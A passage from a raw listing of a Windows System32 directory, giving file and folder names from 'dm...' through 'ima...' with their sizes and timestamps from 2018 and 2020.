30720 09/15/2018 07:28:50 dmoleaututils.dll +F 34304 09/15/2018 07:28:50 DmOmaCpMo.exe +F 33792 09/15/2018 07:28:50 dmprocessxmlfiltered.dll +F 18432 09/15/2018 07:28:50 dmpushproxy.dll +F 188416 03/07/2020 00:53:58 DMPushRouterCore.dll +F 2136064 09/15/2018 07:28:34 DMRCDecoder.dll +F 516472 09/15/2018 09:09:59 DMRServer.dll +F 123392 09/15/2018 07:29:16 dmsynth.dll +F 133120 09/15/2018 07:29:16 dmusic.dll +F 26624 09/15/2018 07:28:45 dmutil.dll +F 176128 03/07/2020 00:53:53 dmvdsitf.dll +F 139264 09/15/2018 07:28:45 dmview.ocx +F 58368 09/15/2018 07:28:51 dmwappushsvc.dll +F 152064 09/15/2018 07:28:23 dmwmicsp.dll +F 97792 09/15/2018 07:28:32 dmxmlhelputils.dll +F 799784 03/07/2020 00:53:26 dnsapi.dll +F 32768 09/15/2018 07:28:51 dnscacheugc.exe +F 134656 03/07/2020 00:54:11 dnscmmc.dll +F 9728 09/15/2018 07:28:56 dnsext.dll +F 108544 09/15/2018 07:29:24 dnshc.dll +F 349696 03/07/2020 00:53:26 dnsrslvr.dll +F 143872 09/15/2018 07:29:25 Docking.VirtualInput.dll +F 14336 09/15/2018 07:28:50 DockInterface.ProxyStub.dll +F 41984 09/15/2018 07:28:58 docprop.dll +F 77312 09/15/2018 07:29:21 DocumentPerformanceEvents.dll +F 756736 03/07/2020 00:53:31 DolbyHrtfEnc.dll +F 119296 03/07/2020 00:53:31 DolbyMATEnc.dll +F 392704 03/07/2020 00:53:27 domgmt.dll +F 267776 09/15/2018 07:29:14 dosettings.dll +F 18944 09/15/2018 07:29:16 doskey.exe +F 1566720 03/07/2020 00:53:27 dosvc.dll +F 92160 09/15/2018 07:28:25 dot3api.dll +F 72192 09/15/2018 07:28:24 dot3cfg.dll +F 29184 09/15/2018 07:28:26 Dot3Conn.dll +F 57344 09/15/2018 07:28:25 dot3dlg.dll +F 58368 09/15/2018 07:28:24 dot3gpclnt.dll +F 278016 09/15/2018 07:28:26 dot3gpui.dll +F 74752 09/15/2018 07:29:23 dot3hc.dll +F 180736 09/15/2018 07:28:25 dot3mm.dll +F 104448 09/15/2018 07:28:25 dot3msm.dll +F 265728 09/15/2018 07:28:25 dot3svc.dll +F 317440 09/15/2018 07:28:25 dot3ui.dll +D 0 09/15/2018 06:09:29 downlevel +F 15872 09/15/2018 07:28:46 dpapi.dll +F 76800 09/15/2018 07:28:57 dpapimig.exe +F 56320 09/15/2018 07:29:14 dpapiprovider.dll +F 208896 03/07/2020 00:53:26 dpapisrv.dll +F 79360 09/15/2018 07:29:14 DpiScaling.exe +F 10240 09/15/2018 07:29:16 dpnaddr.dll +F 10240 09/15/2018 07:29:16 dpnathlp.dll +F 10240 09/15/2018 07:29:16 dpnet.dll +F 10240 09/15/2018 07:29:16 dpnhpast.dll +F 10240 09/15/2018 07:29:16 dpnhupnp.dll +F 10240 09/15/2018 07:29:16 dpnlobby.dll +F 10240 09/15/2018 07:29:16 dpnsvr.exe +F 169984 09/15/2018 07:29:24 dps.dll +F 657408 09/15/2018 07:28:50 dpx.dll +F 46080 09/15/2018 07:29:14 DragDropExperienceDataExchangeDelegated.dll +F 82944 09/15/2018 07:28:56 driverquery.exe +D 0 03/07/2020 10:33:17 drivers +D 0 09/15/2018 07:33:50 DriverState +D 0 03/29/2020 11:25:00 DriverStore +F 25600 09/15/2018 07:29:23 drprov.dll +F 279552 09/15/2018 07:29:24 drt.dll +F 315 03/07/2020 00:53:28 DrtmAuth1.bin +F 315 03/07/2020 00:53:28 DrtmAuth2.bin +F 315 03/07/2020 00:53:28 DrtmAuth3.bin +F 315 03/07/2020 00:53:28 DrtmAuth4.bin +F 315 03/07/2020 00:53:28 DrtmAuth5.bin +F 315 03/07/2020 00:53:28 DrtmAuth6.bin +F 315 03/07/2020 00:53:28 DrtmAuth7.bin +F 315 03/07/2020 00:53:28 DrtmAuth8.bin +F 69120 09/15/2018 07:29:24 drtprov.dll +F 54784 09/15/2018 07:29:24 drttransport.dll +F 78848 09/15/2018 07:28:38 drvcfg.exe +F 169984 03/07/2020 00:53:44 drvinst.exe +F 109568 03/07/2020 00:53:28 drvsetup.dll +F 1213752 03/07/2020 00:53:28 drvstore.dll +F 46080 09/15/2018 07:29:14 dsauth.dll +D 0 09/15/2018 09:07:52 dsc +F 476160 03/07/2020 00:53:24 DscCore.dll +F 200704 09/15/2018 07:29:20 DscCoreConfProv.dll +F 52152 09/15/2018 07:28:30 dsclient.dll +F 19968 09/15/2018 07:29:20 dscproxy.dll +F 26624 09/15/2018 07:29:21 DscTimer.dll +F 196096 09/15/2018 07:28:22 dsdmo.dll +F 130048 09/15/2018 07:29:14 dskquota.dll +F 226816 09/15/2018 07:29:14 dskquoui.dll +F 17920 09/15/2018 07:28:50 DsmUserTask.exe +F 593920 03/07/2020 00:53:31 dsound.dll +F 31744 09/15/2018 07:28:46 dsparse.dll +F 170496 09/15/2018 07:28:50 dsprop.dll +F 443904 09/15/2018 07:28:50 dsquery.dll +F 744448 09/15/2018 07:28:30 dsreg.dll +F 954368 09/15/2018 07:29:25 dsregcmd.exe +F 28936 09/15/2018 07:28:45 dsrole.dll +F 215943 09/15/2018 07:31:36 dssec.dat +F 58880 09/15/2018 07:29:14 dssec.dll +F 153368 09/15/2018 07:28:46 dssenh.dll +F 164864 03/07/2020 00:53:37 dssvc.dll +F 13312 09/15/2018 07:28:30 dstokenclean.exe +F 150016 09/15/2018 07:29:16 Dsui.dll +F 686080 09/15/2018 07:28:50 dsuiext.dll +F 28160 09/15/2018 07:29:16 dswave.dll +F 37888 09/15/2018 07:28:50 dtsh.dll +F 133432 03/07/2020 00:53:31 DTUHandler.exe +F 22016 09/15/2018 07:28:20 DTUHandlerPS.dll +F 122368 09/15/2018 07:28:39 DuCsps.dll +F 1761280 03/07/2020 00:53:57 dui70.dll +F 581120 09/15/2018 07:28:50 duser.dll +F 48128 09/15/2018 07:29:13 dusmapi.dll +F 359424 03/07/2020 00:54:08 dusmsvc.dll +F 37376 09/15/2018 07:29:13 dusmtask.exe +F 11776 09/15/2018 07:29:22 dvdplay.exe +F 50176 03/07/2020 00:53:53 dwm.exe +F 168488 03/07/2020 00:53:53 dwmapi.dll +F 3490304 03/07/2020 00:53:53 dwmcore.dll +F 62464 09/15/2018 07:28:45 dwmghost.dll +F 52024 09/15/2018 07:28:44 dwminit.dll +F 130560 03/07/2020 00:53:53 dwmredir.dll +F 3082752 03/07/2020 00:53:39 DWrite.dll +F 217088 03/07/2020 00:54:15 DWWIN.EXE +F 370176 03/07/2020 00:54:11 dxdiag.exe +F 374784 09/15/2018 07:29:16 dxdiagn.dll +F 780408 03/07/2020 00:53:39 dxgi.dll +F 48128 09/15/2018 07:28:32 dxgiadaptercache.exe +F 20992 09/15/2018 07:28:51 dxgwdi.dll +F 1268224 09/15/2018 07:28:32 dxilconv.dll +F 7168 09/15/2018 09:08:37 dxmasf.dll +F 467968 09/15/2018 07:29:14 DXP.dll +F 37888 09/15/2018 07:29:14 dxpps.dll +F 308224 09/15/2018 07:29:14 Dxpserver.exe +F 1432064 09/15/2018 07:29:14 DxpTaskSync.dll +F 472576 09/15/2018 07:29:16 dxtmsft.dll +F 282112 09/15/2018 07:29:16 dxtrans.dll +F 128296 09/15/2018 07:28:32 dxva2.dll +F 745552 09/15/2018 07:28:22 DynamicLong.bin +F 515152 09/15/2018 07:28:22 DynamicMedium.bin +F 323152 09/15/2018 07:28:22 DynamicShort.bin +F 56320 09/15/2018 07:28:50 dynamoapi.dll +F 50176 09/15/2018 07:28:38 EAMProgressHandler.dll +F 13824 09/15/2018 07:28:23 Eap3Host.exe +F 320000 09/15/2018 07:28:22 eapp3hst.dll +F 239616 09/15/2018 07:28:22 eappcfg.dll +F 312832 09/15/2018 07:28:51 eappcfgui.dll +F 105984 09/15/2018 07:28:22 eappgnui.dll +F 302080 09/15/2018 07:28:22 eapphost.dll +F 72704 09/15/2018 07:28:22 eappprxy.dll +F 52224 09/15/2018 07:28:57 eapprovp.dll +F 145920 09/15/2018 07:28:50 eapsimextdesktop.dll +F 110080 09/15/2018 07:28:23 eapsvc.dll +F 23040 09/15/2018 07:28:51 easconsent.dll +F 320000 09/15/2018 07:28:43 EaseOfAccessDialog.exe +F 77160 09/15/2018 07:29:14 easinvoker.exe +F 29184 09/15/2018 07:29:14 easinvoker.proxystub.dll +F 64000 03/07/2020 00:54:28 EASPolicyManagerBrokerHost.exe +F 14848 09/14/2018 18:02:00 EasPolicyManagerBrokerPS.dll +F 177152 09/15/2018 07:29:14 easwrt.dll +F 2150912 03/07/2020 00:54:15 edgeangle.dll +F 4050432 03/07/2020 00:53:40 EdgeContent.dll +F 26807296 03/07/2020 00:54:15 edgehtml.dll +F 72 03/07/2020 00:53:21 edgehtmlpluginpolicy.bin +F 449024 03/07/2020 00:53:57 edgeIso.dll +F 912384 03/07/2020 00:54:15 EdgeManager.dll +F 87040 09/15/2018 07:28:32 EditBufferTestHook.dll +F 188928 09/15/2018 07:28:45 EditionUpgradeHelper.dll +F 240376 03/07/2020 00:53:52 EditionUpgradeManagerObj.dll +F 138240 09/15/2018 07:28:50 edpauditapi.dll +F 162816 03/07/2020 00:54:09 EDPCleanup.exe +F 164864 03/07/2020 00:54:09 edpcsp.dll +F 61952 09/15/2018 07:28:50 edpnotify.exe +F 71680 09/15/2018 07:28:50 edptask.dll +F 259584 09/15/2018 07:28:50 edputil.dll +F 97280 03/07/2020 00:54:17 EduPrintProv.exe +F 417792 03/07/2020 00:53:31 eeprov.dll +F 57344 09/15/2018 07:28:20 eeutil.dll +F 128512 09/15/2018 07:28:51 efsadu.dll +F 1125392 03/07/2020 00:53:57 efscore.dll +F 69632 09/15/2018 07:28:51 efsext.dll +F 108544 03/07/2020 00:53:57 efslsaext.dll +F 79872 09/15/2018 07:28:50 efssvc.dll +F 14336 09/15/2018 07:28:51 efsui.exe +F 45056 09/15/2018 07:28:52 efsutil.dll +F 788480 03/07/2020 00:53:46 efswrt.dll +F 132096 09/15/2018 07:29:14 EhStorAPI.dll +F 129024 09/15/2018 07:29:14 EhStorAuthn.exe +F 112128 09/15/2018 07:29:14 EhStorPwdMgr.dll +F 207872 09/15/2018 07:28:50 EhStorShell.dll +D 0 09/15/2018 09:09:27 el-GR +F 225792 09/15/2018 07:29:18 els.dll +F 77824 09/15/2018 07:28:52 ELSCore.dll +F 239104 09/15/2018 07:29:18 elshyph.dll +F 701952 09/15/2018 07:28:53 elslad.dll +F 29696 09/15/2018 07:28:52 elsTrans.dll +F 1129472 09/15/2018 07:28:34 EmailApis.dll +F 168960 09/15/2018 07:28:30 embeddedmodesvc.dll +F 47616 09/15/2018 07:28:30 embeddedmodesvcapi.dll +F 57344 09/15/2018 07:28:22 EmojiDS.dll +D 0 09/15/2018 09:10:11 en +D 0 03/07/2020 00:55:54 en-GB +D 0 03/07/2020 00:55:54 en-US +F 26624 09/15/2018 07:29:21 encapi.dll +F 99688 09/15/2018 07:28:46 EncDump.dll +F 647168 09/15/2018 07:29:14 energy.dll +F 175104 03/07/2020 00:53:31 energyprov.dll +F 26112 09/15/2018 07:29:20 energytask.dll +F 228352 03/07/2020 00:53:58 enrollmentapi.dll +F 143360 09/15/2018 07:29:16 EnterpriseAPNCsp.dll +F 25600 09/15/2018 07:28:36 EnterpriseAppMgmtClient.dll +F 506880 03/07/2020 00:53:43 EnterpriseAppMgmtSvc.dll +F 91648 09/15/2018 09:09:59 EnterpriseAppVMgmtCSP.dll +F 1708544 03/07/2020 00:53:58 enterprisecsps.dll +F 91648 09/15/2018 07:29:16 EnterpriseDesktopAppMgmtCSP.dll +F 19968 09/15/2018 07:28:50 enterpriseetw.dll +F 190464 09/15/2018 07:28:38 EnterpriseModernAppMgmtCSP.dll +F 84480 03/07/2020 00:53:58 enterpriseresourcemanager.dll +F 79872 09/15/2018 07:29:19 eqossnap.dll +F 209920 09/15/2018 07:28:30 ErrorDetails.dll +F 46592 09/15/2018 07:28:30 ErrorDetailsCore.dll +D 0 09/15/2018 09:09:27 es-ES +D 0 09/15/2018 09:09:27 es-MX +F 490496 09/15/2018 07:28:42 es.dll +F 20480 09/15/2018 07:28:50 EsdSip.dll +F 3269632 03/07/2020 00:53:28 esent.dll +F 65024 09/15/2018 07:29:16 esentprf.dll +F 375296 03/07/2020 00:54:11 esentutl.exe +F 37376 09/15/2018 07:29:18 esevss.dll +F 142848 09/15/2018 07:28:42 eShims.dll +F 33792 09/15/2018 07:28:22 esrb.rs +D 0 09/15/2018 09:09:27 et-EE +F 184832 09/15/2018 07:28:36 EthernetMediaManager.dll +F 154112 09/15/2018 07:28:34 ETWCoreUIComponentsResources.dll +F 78848 09/15/2018 07:28:36 ETWESEProviderResources.dll +F 48128 09/15/2018 07:28:50 EtwRundown.dll +F 356352 09/15/2018 07:29:16 eudcedit.exe +F 144896 09/15/2018 07:29:25 eUICCsCSP.dll +F 78848 09/15/2018 07:28:29 EventAggregation.dll +F 17408 09/15/2018 07:29:22 eventcls.dll +F 42496 09/15/2018 07:29:23 eventcreate.exe +F 17935 09/15/2018 07:29:16 EventViewer_EventDetails.xsl +F 83968 09/15/2018 07:29:16 eventvwr.exe +F 145127 09/15/2018 07:29:16 eventvwr.msc +F 751696 09/15/2018 09:10:04 evr.dll +F 314072 03/07/2020 00:53:37 ExecModelClient.dll +F 83456 09/15/2018 07:28:30 execmodelproxy.dll +F 66048 09/15/2018 07:28:51 expand.exe +F 4736512 03/07/2020 00:53:46 ExplorerFrame.dll +F 263168 09/15/2018 07:28:36 ExSMime.dll +F 34304 09/15/2018 07:28:44 extrac32.exe +F 24576 09/15/2018 07:28:36 ExtrasXmlParser.dll +D 0 09/15/2018 09:07:52 F12 +F 8704 09/15/2018 07:28:53 f3ahvoas.dll +F 604672 03/07/2020 00:54:08 facecredentialprovider.dll +F 99840 09/15/2018 07:28:55 Family.Authentication.dll +F 98816 09/15/2018 07:28:55 Family.Cache.dll +F 147456 09/15/2018 07:28:56 Family.Client.dll +F 260096 09/15/2018 07:28:56 Family.SyncEngine.dll +F 14336 09/15/2018 07:28:42 FamilySafetyExt.dll +F 451120 03/07/2020 00:53:29 Faultrep.dll +F 31232 09/15/2018 07:28:26 FaxPrinterInstaller.dll +F 24576 09/15/2018 07:29:13 fc.exe +F 154624 03/07/2020 00:54:30 fcon.dll +F 71168 03/07/2020 00:53:51 fdBth.dll +F 14336 09/15/2018 07:28:42 fdBthProxy.dll +F 35328 09/15/2018 07:28:50 FdDevQuery.dll +F 158208 09/15/2018 07:28:45 fde.dll +F 158720 09/15/2018 07:28:44 fdeploy.dll +F 21504 09/15/2018 07:28:51 fdPHost.dll +F 59904 09/15/2018 07:28:50 fdPnp.dll +F 289280 09/15/2018 07:28:56 fdprint.dll +F 68096 09/15/2018 07:28:51 fdProxy.dll +F 35328 09/15/2018 07:28:50 FDResPub.dll +F 108032 03/07/2020 00:54:08 fdSSDP.dll +F 110080 09/15/2018 07:28:24 fdWCN.dll +F 30208 09/15/2018 07:28:51 fdWNet.dll +F 152064 03/07/2020 00:54:09 fdWSD.dll +F 44257 09/15/2018 07:28:26 FeatureToastBulldogImg.png +F 246272 03/07/2020 00:53:57 feclient.dll +F 68608 09/15/2018 07:28:30 ffbroker.dll +F 290304 09/15/2018 07:29:24 fhcat.dll +F 430592 09/15/2018 07:29:24 fhcfg.dll +F 54272 09/15/2018 07:29:24 fhcleanup.dll +F 335872 09/15/2018 07:29:24 fhcpl.dll +F 241664 09/15/2018 07:29:24 fhengine.dll +F 72704 09/15/2018 07:29:24 fhevents.dll +F 65024 09/15/2018 07:29:24 fhlisten.dll +F 139776 09/15/2018 07:29:24 fhmanagew.exe +F 437760 09/15/2018 07:29:24 fhsettingsprovider.dll +F 153600 09/15/2018 07:29:24 fhshl.dll +F 79872 09/15/2018 07:29:24 fhsrchapi.dll +F 69120 09/15/2018 07:29:24 fhsrchph.dll +F 120832 09/15/2018 07:29:24 fhsvc.dll +F 29696 09/15/2018 07:29:24 fhsvcctl.dll +F 59392 09/15/2018 07:29:24 fhtask.dll +F 132608 09/15/2018 07:29:24 fhuxadapter.dll +F 16896 09/15/2018 07:29:24 fhuxapi.dll +F 45568 09/15/2018 07:29:24 fhuxcommon.dll +F 78336 03/07/2020 00:54:17 fhuxgraphics.dll +F 902656 09/15/2018 07:29:24 fhuxpresentation.dll +D 0 09/15/2018 09:09:27 fi-FI +F 218112 09/15/2018 07:28:34 fidocredprov.dll +F 33792 09/15/2018 07:28:34 FileAppxStreamingDataSource.dll +F 250880 03/07/2020 00:54:17 FileHistory.exe +F 556544 09/15/2018 07:28:56 filemgmt.dll +F 166400 03/07/2020 00:53:28 FilterDS.dll +F 17408 09/15/2018 07:29:16 find.exe +F 66560 09/15/2018 07:28:57 findnetprinters.dll +F 35328 09/15/2018 07:29:14 findstr.exe +F 15872 09/15/2018 07:29:14 finger.exe +F 119296 09/15/2018 07:29:14 fingerprintcredential.dll +F 7168 09/15/2018 07:29:18 Firewall.cpl +F 552448 03/07/2020 00:53:40 FirewallAPI.dll +F 936960 09/15/2018 07:29:16 FirewallControlPanel.dll +F 21504 09/15/2018 07:28:44 fixmapi.exe +F 889344 03/07/2020 00:53:32 FlightSettings.dll +F 32008 09/15/2018 07:28:46 fltLib.dll +F 30720 09/15/2018 07:28:46 fltMC.exe +F 2725888 09/15/2018 07:28:22 FluencyDS.dll +F 75776 09/15/2018 07:29:23 fmapi.dll +F 59704 09/15/2018 07:28:38 fmifs.dll +F 200704 09/15/2018 07:28:50 fms.dll +F 303120 03/30/2020 07:41:49 FNTCACHE.DAT +F 1904128 03/07/2020 00:53:39 FntCache.dll +F 47104 09/15/2018 07:29:21 fodhelper.exe +F 112128 09/15/2018 07:29:21 Fondue.exe +F 808272 03/07/2020 00:53:55 fontdrvhost.exe +F 974848 03/07/2020 00:53:34 fontext.dll +F 60416 09/15/2018 07:28:50 FontGlyphAnimator.dll +F 19456 09/15/2018 07:28:50 fontgroupsoverride.dll +F 138240 09/15/2018 07:28:32 FontProvider.dll +F 125440 03/07/2020 00:53:55 fontsub.dll +F 121344 09/15/2018 07:28:24 fontview.exe +F 49152 09/15/2018 07:29:14 forfiles.exe +F 38400 09/15/2018 07:28:43 format.com +F 41472 09/15/2018 07:28:22 fpb.rs +F 123392 09/15/2018 07:28:55 fphc.dll +D 0 03/07/2020 00:55:54 fr-CA +D 0 03/07/2020 00:55:54 fr-FR +F 254976 09/15/2018 07:28:39 framedyn.dll +F 303616 09/15/2018 07:28:25 framedynos.dll +F 701440 03/07/2020 00:54:16 FrameServer.dll +F 84480 09/15/2018 07:28:44 frprov.dll +F 16896 09/15/2018 07:29:23 fsavailux.exe +F 316416 03/07/2020 00:54:16 FSClient.dll +F 99400 09/15/2018 07:29:21 FsIso.exe +F 144909 09/15/2018 07:28:56 fsmgmt.msc +F 146944 09/15/2018 07:28:42 fsquirt.exe +F 183808 03/07/2020 00:54:08 fsutil.exe +F 32256 09/15/2018 07:28:44 fsutilext.dll +F 67584 09/15/2018 07:29:23 fthsvc.dll +F 58880 09/15/2018 07:29:23 ftp.exe +F 153600 09/15/2018 07:28:50 fundisc.dll +F 898048 03/07/2020 00:54:25 fveapi.dll +F 370688 03/07/2020 00:54:25 fveapibase.dll +F 27136 09/15/2018 09:10:03 fvecerts.dll +F 331776 03/07/2020 00:54:25 fvecpl.dll +F 174592 09/15/2018 09:09:55 fvenotify.exe +F 163328 09/15/2018 09:09:56 fveprompt.exe +F 69120 03/07/2020 00:54:25 fveskybackup.dll +F 309760 03/07/2020 00:54:25 fveui.dll +F 815616 03/07/2020 00:54:25 fvewiz.dll +F 159744 09/15/2018 07:28:34 fwbase.dll +F 55296 09/15/2018 07:29:19 fwcfg.dll +F 91648 09/15/2018 07:28:36 fwmdmcsp.dll +F 234496 09/15/2018 07:28:34 fwpolicyiomgr.dll +F 470016 03/07/2020 00:53:40 FWPUCLNT.DLL +F 99328 09/15/2018 07:28:50 FwRemoteSvr.dll +F 281600 09/15/2018 07:29:56 FXSAPI.dll +F 90112 09/15/2018 07:29:56 FXSCOM.dll +F 650752 09/15/2018 07:29:56 FXSCOMEX.dll +F 415232 09/15/2018 07:29:47 FXSCOMPOSE.dll +F 35328 09/15/2018 07:29:47 FXSCOMPOSERES.dll +F 234496 09/15/2018 07:29:47 FXSCOVER.exe +F 8192 09/15/2018 07:29:56 FXSEVENT.dll +F 46592 09/15/2018 07:29:56 FXSMON.dll +F 925696 09/15/2018 07:29:56 FXSRESM.dll +F 77824 09/15/2018 07:29:56 FXSROUTE.dll +F 857088 09/15/2018 07:29:56 FXSST.dll +F 636928 09/15/2018 07:29:56 FXSSVC.exe +F 254976 09/15/2018 07:29:56 FXST30.dll +F 412160 09/15/2018 07:29:56 FXSTIFF.dll +D 0 03/07/2020 10:34:53 FxsTmp +F 19456 09/15/2018 07:29:56 FXSUNATD.exe +F 181248 09/15/2018 07:29:47 FXSUTILITY.dll +F 59904 09/15/2018 07:29:22 g711codc.ax +F 306688 09/15/2018 07:29:13 GameBarPresenceWriter.exe +F 13824 09/15/2018 07:29:13 GameBarPresenceWriter.proxy.dll +F 12288 09/15/2018 07:29:13 GameChatOverlayExt.dll +F 128000 09/15/2018 07:28:30 GameChatTranscription.dll +F 28672 09/15/2018 07:28:30 gamemode.dll +F 1292800 03/07/2020 00:54:08 GamePanel.exe +F 27136 09/15/2018 07:29:13 GamePanelExternalHook.dll +F 1480 09/15/2018 07:28:22 GameSystemToastIcon.contrast-white.png +F 1132 09/15/2018 07:28:22 GameSystemToastIcon.png +F 25088 09/15/2018 07:29:16 gameux.dll +F 163840 09/15/2018 07:28:30 gamingtcui.dll +F 88781 09/15/2018 07:29:23 gatherNetworkInfo.vbs +F 24006 09/15/2018 07:29:22 gb2312.uce +F 132096 09/15/2018 07:29:14 gcdef.dll +F 157024 03/07/2020 00:53:39 gdi32.dll +F 1668752 03/07/2020 00:53:57 gdi32full.dll +F 1702400 03/07/2020 00:53:57 GdiPlus.dll +F 811536 03/07/2020 00:53:50 generaltel.dll +F 664168 09/15/2018 07:28:58 GenValObj.exe +F 51712 09/15/2018 07:28:36 Geocommon.dll +F 470528 09/15/2018 07:28:34 Geolocation.dll +F 85504 09/15/2018 07:28:56 getmac.exe +F 11264 09/15/2018 07:29:22 getuname.dll +F 509440 09/15/2018 07:29:20 glmf32.dll +F 317440 09/15/2018 07:28:30 GlobCollationHost.dll +F 146944 03/07/2020 00:53:30 globinputhost.dll +F 163328 09/15/2018 07:29:21 glu32.dll +F 38400 09/15/2018 07:28:46 gmsaclient.dll +F 130112 09/15/2018 07:28:50 gpapi.dll +F 1089536 09/15/2018 07:29:18 gpedit.dll +F 147439 09/15/2018 09:10:05 gpedit.msc +F 694784 09/15/2018 09:10:00 gpprefcl.dll +F 39424 09/15/2018 07:28:25 gpprnext.dll +F 224256 09/15/2018 07:29:16 gpresult.exe +F 50688 09/15/2018 09:09:59 gpscript.dll +F 45568 09/15/2018 09:09:59 gpscript.exe +F 1280000 03/07/2020 00:53:57 gpsvc.dll +F 26112 09/15/2018 07:28:51 gptext.dll +F 29184 09/15/2018 07:29:16 gpupdate.exe +F 138752 03/07/2020 00:53:40 GraphicsCapture.dll +F 93696 09/15/2018 07:28:32 GraphicsPerfSvc.dll +F 19456 09/15/2018 07:28:22 grb.rs +F 75264 03/07/2020 00:54:18 Groupinghc.dll +D 0 03/29/2020 10:22:28 GroupPolicy +D 0 09/15/2018 07:33:50 GroupPolicyUsers +F 51200 09/15/2018 07:29:23 grpconv.exe +F 591376 03/07/2020 00:53:43 hal.dll +F 20968 09/15/2018 07:28:18 HalExtIntcLpioDMA.dll +F 18920 09/15/2018 07:28:18 HalExtPL080.dll +F 1243 09/15/2018 07:28:22 HandwritingSystemToastIcon.contrast-white.png +F 912 09/15/2018 07:28:22 HandwritingSystemToastIcon.png +F 93184 09/15/2018 07:28:24 hascsp.dll +F 110592 03/07/2020 00:53:31 HashtagDS.dll +F 82944 09/15/2018 07:28:45 hbaapi.dll +F 61952 09/15/2018 07:28:50 hcproviders.dll +F 299560 09/15/2018 07:29:14 HdcpHandler.dll +F 382464 09/15/2018 07:28:56 hdwwiz.cpl +F 67584 09/15/2018 07:28:56 hdwwiz.exe +D 0 09/15/2018 09:09:27 he-IL +F 1460 09/15/2018 07:28:22 HeadphoneSystemToastIcon.contrast-white.png +F 1114 09/15/2018 07:28:22 HeadphoneSystemToastIcon.png +F 1560 09/15/2018 07:28:22 HeadsetSystemToastIcon.contrast-white.png +F 1196 09/15/2018 07:28:22 HeadsetSystemToastIcon.png +F 1832 09/15/2018 07:28:22 HealthSystemToastIcon.contrast-white.png +F 1660 09/15/2018 07:28:22 HealthSystemToastIcon.png +F 262656 03/07/2020 00:53:40 HeatCore.dll +F 11776 09/15/2018 07:29:14 help.exe +F 55808 09/15/2018 07:29:16 HelpPaneProxy.dll +F 620032 09/15/2018 07:28:50 hgcpl.dll +F 225792 09/15/2018 07:29:25 hgprint.dll +F 695296 03/07/2020 00:54:15 hhctrl.ocx +F 55808 09/15/2018 07:29:18 hhsetup.dll +F 38912 09/15/2018 07:28:50 hid.dll +F 39936 09/15/2018 07:29:21 hidphone.tsp +F 34816 09/15/2018 07:28:51 hidserv.dll +F 101376 03/07/2020 00:53:57 hlink.dll +F 59904 03/07/2020 00:53:33 hmkd.dll +F 400384 09/15/2018 07:29:18 hnetcfg.dll +F 257536 09/15/2018 07:28:57 HNetCfgClient.dll +F 16384 09/15/2018 07:29:18 hnetmon.dll +F 14336 09/15/2018 07:29:14 HOSTNAME.EXE +F 90624 09/15/2018 07:28:56 hotplug.dll +D 0 09/15/2018 09:09:27 hr-HR +F 479744 09/15/2018 07:28:22 HrtfApo.dll +F 424448 09/15/2018 07:29:16 html.iec +F 33280 09/15/2018 07:28:46 httpapi.dll +F 18944 09/15/2018 07:28:56 httpprxc.dll +F 119808 09/15/2018 07:28:56 httpprxm.dll +F 19456 09/15/2018 07:28:56 httpprxp.dll +F 251904 03/07/2020 00:53:43 HttpsDataSource.dll +F 42496 09/15/2018 07:28:57 htui.dll +D 0 09/15/2018 09:09:27 hu-HU +F 1049400 03/07/2020 00:53:22 hvax64.exe +F 61480 03/07/2020 00:53:22 hvhostsvc.dll +F 1258296 03/07/2020 00:53:22 hvix64.exe +F 90632 03/07/2020 00:53:22 hvloader.dll +F 141328 09/15/2018 09:09:58 hvsievaluator.exe +F 140304 09/15/2018 09:10:05 hvsigpext.dll +F 38712 09/15/2018 07:29:24 HvSocket.dll +D 0 09/15/2018 07:34:00 ias +F 31232 09/15/2018 07:29:18 ias.dll +F 87040 09/15/2018 07:29:18 iasacct.dll +F 76288 09/15/2018 07:29:18 iasads.dll +F 76800 09/15/2018 07:29:18 iasdatastore.dll +F 91648 09/15/2018 07:29:18 iashlpr.dll +F 695608 09/15/2018 07:29:18 IasMigPlugin.dll +F 147456 09/15/2018 07:29:18 iasnap.dll +F 50176 09/15/2018 07:29:18 iaspolcy.dll +F 234496 09/15/2018 07:29:18 iasrad.dll +F 181760 09/15/2018 07:29:18 iasrecst.dll +F 262656 09/15/2018 07:29:18 iassam.dll +F 462848 09/15/2018 07:29:18 iassdo.dll +F 147968 09/15/2018 07:29:16 iassvcs.dll +F 37888 09/15/2018 07:29:16 icacls.exe +F 102400 09/15/2018 07:28:34 icfupgd.dll +F 253952 09/15/2018 07:28:34 icm32.dll +F 3072 09/15/2018 07:29:16 icmp.dll +F 26624 09/15/2018 07:28:52 icmui.dll +F 14336 09/15/2018 07:28:51 IconCodecService.dll +F 36864 09/15/2018 07:28:34 IcsEntitlementHost.exe +F 201216 09/15/2018 07:29:18 icsigd.dll +F 17408 09/15/2018 07:28:57 icsunattend.exe +F 300024 03/07/2020 00:53:22 icsvc.dll +F 310784 03/07/2020 00:53:22 icsvcext.dll +D 0 09/15/2018 07:34:00 icsxml +F 1860096 03/07/2020 00:53:26 icuin.dll +F 1347072 09/15/2018 07:28:36 icuuc.dll +F 115712 09/15/2018 07:28:57 IdCtrls.dll +F 60458 09/15/2018 07:29:22 ideograf.uce +F 198144 09/15/2018 07:28:45 IdListen.dll +F 10240 09/15/2018 07:28:52 idndl.dll +F 142848 09/15/2018 07:28:30 IDStore.dll +F 228352 03/07/2020 00:54:13 ie4uinit.exe +F 74752 09/15/2018 07:29:16 ie4ushowIE.exe +F 144384 09/15/2018 07:29:18 IEAdvpack.dll +F 1605632 09/15/2018 07:29:16 ieapfltr.dll +F 398848 03/07/2020 00:54:15 iedkcs32.dll +F 13013504 03/07/2020 00:54:15 ieframe.dll +F 65536 09/15/2018 07:29:17 iemigplugin.dll +F 144896 09/15/2018 07:29:18 iepeers.dll +F 852480 03/07/2020 00:54:13 ieproxy.dll +F 46592 09/15/2018 07:29:16 iernonce.dll +F 2779272 03/07/2020 00:53:57 iertutil.dll +F 78336 09/15/2018 07:29:16 iesetup.dll +F 45568 09/15/2018 07:29:17 iesysprep.dll +F 563200 09/15/2018 07:29:18 ieui.dll +F 3329 09/15/2018 07:29:16 ieuinit.inf +F 153088 09/15/2018 07:29:18 ieUnatt.exe +F 166912 09/15/2018 07:29:16 iexpress.exe +F 31232 09/15/2018 07:29:14 ifmon.dll +F 213816 09/15/2018 07:28:38 ifsutil.dll +F 16896 09/15/2018 07:29:22 ifsutilx.dll +F 86528 09/15/2018 07:29:23 igdDiag.dll +F 199680 03/07/2020 00:53:31 IHDS.dll +F 69632 09/15/2018 07:28:25 ihvrilproxy.dll +F 1059328 03/07/2020 00:53:40 IKEEXT.DLL +F 36680 09/15/2018 07:28:20 imaadp32.acm +F 106896 09/15/2018 07:28:46 